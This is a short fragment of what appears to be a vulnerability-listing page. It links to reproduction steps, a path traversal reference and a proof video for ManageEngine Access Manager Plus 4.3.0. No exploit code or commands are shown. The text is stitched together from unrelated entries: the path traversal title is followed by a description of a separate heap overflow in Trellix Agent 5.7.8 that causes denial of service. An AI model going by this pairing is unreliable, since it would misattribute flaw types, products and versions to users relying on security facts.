Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309))## Reference:[href](https://portswigger.net/kb/issues/00100300_file-path-traversal)## Proof and Exploit:[href](https://streamable.com/scdzsb)## Time spent`03:00:00`

ManageEngine Access Manager Plus 4.3.0 Path Traversal

A heap-based overflow vulnerability in Trellix Agent (Windows and Linux) version 5.7.8 and earlier, allows a remote user to alter the page heap in the macmnsvc process memory block resulting in the service becoming unavailable.

Tag

#windows